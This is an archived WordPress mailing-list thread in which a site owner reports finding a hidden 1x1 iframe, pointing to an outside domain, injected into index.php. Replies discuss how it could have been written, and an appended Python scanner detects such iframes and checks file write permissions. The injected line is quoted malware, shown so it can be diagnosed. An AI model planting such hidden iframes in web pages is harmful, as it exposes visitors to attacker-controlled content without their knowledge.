[wp-hackers] XSS vuln in wordpress 2.7 ?

Joost de Valk joost at yoast.com
Mon Dec 22 17:33:58 GMT 2008


If the file is writable for the webserver and file access is enabled on the webserver: yes.

Joost de Valk

joost at yoast.com

http://yoast.com/
http://twitter.com/jdevalk

Sent from my iPhone

On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:

> Wow. That's nasty, and malicious. Could a plugin do that?
>
> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>
>> Hello,
>>
>> For some reason i found my blog's index.php (not theme's index.php)
>> with the following piece of code right before the ?>
>>
>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>
>> I tried looking at the logs. No luck. The file's permissions look like this:
>>
>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/index.php
>>
>> I'm still trying to figure out how that line got there. I've
>> downloaded wordpress right from wordpress.org, and the server is a
>> dedicated one, only two users with shell access to it.
>>
>> Any suggestions?
>>
>> -- 
>> Regards,
>> madalin
>> http://madalin.eu
>> http://www.tg-jiu.ro
>> http://www.radioomega.ro
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
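The two questions in this thread, whether a file carries an echoed hidden iframe like the one found in index.php and whether the webserver account could have written it, can be checked mechanically. The following is an added example and not code from the thread or from WordPress; it assumes you pass the uid/gid the webserver runs as, and the sample source and its domain are constructed.

```python
import os
import re
import stat

# Echoed <iframe> inside a PHP double-quoted string; attributes captured for inspection.
IFRAME_ECHO = re.compile(r'echo\s+"<iframe\s+(?P<attrs>[^>]*)>\s*</iframe>\s*";', re.I | re.S)

def looks_hidden(attrs):
    # Hidden via CSS, or sized down to a 1x1 (or 0x0) pixel box.
    compact = attrs.replace(" ", "").lower()
    if "visibility:hidden" in compact or "display:none" in compact:
        return True
    return re.search(r'(width|height)=["\']?[01]\b', compact) is not None

def find_hidden_iframes(source):
    # Returns [(line_number, src_url)] for each echoed iframe that looks hidden.
    findings = []
    for m in IFRAME_ECHO.finditer(source):
        attrs = m.group("attrs").replace('\\"', '"')  # undo PHP string escaping
        if looks_hidden(attrs):
            src = re.search(r'src="([^"]+)"', attrs)
            line = source.count("\n", 0, m.start()) + 1
            findings.append((line, src.group(1) if src else None))
    return findings

def writable_by(mode, file_uid, file_gid, uid, gid):
    # Could a process running as uid/gid write a file with this owner and these mode bits?
    if file_uid == uid and mode & stat.S_IWUSR:
        return True
    if file_gid == gid and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)

def scan_tree(root, web_uid, web_gid):
    # Walk a WordPress install; report each hit with whether the webserver could have written it.
    report = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read())
                if hits:
                    st = os.stat(path)
                    report.append((path, hits, writable_by(st.st_mode, st.st_uid, st.st_gid, web_uid, web_gid)))
    return report

# Constructed sample mirroring the injected line from the thread; the domain is a placeholder.
SAMPLE = ('<?php\nrequire("./wp-blog-header.php");\n'
          'echo "<iframe src=\\"http://malicious.invalid/?click=0\\" width=1\n'
          'height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";\n?>\n')
```

For the permissions shown in the thread (-rw-r--r-- owned by madalin) `writable_by` returns False for a webserver running as a different user, which is why a writable file or a compromised account, not the mode bits alone, has to explain the change.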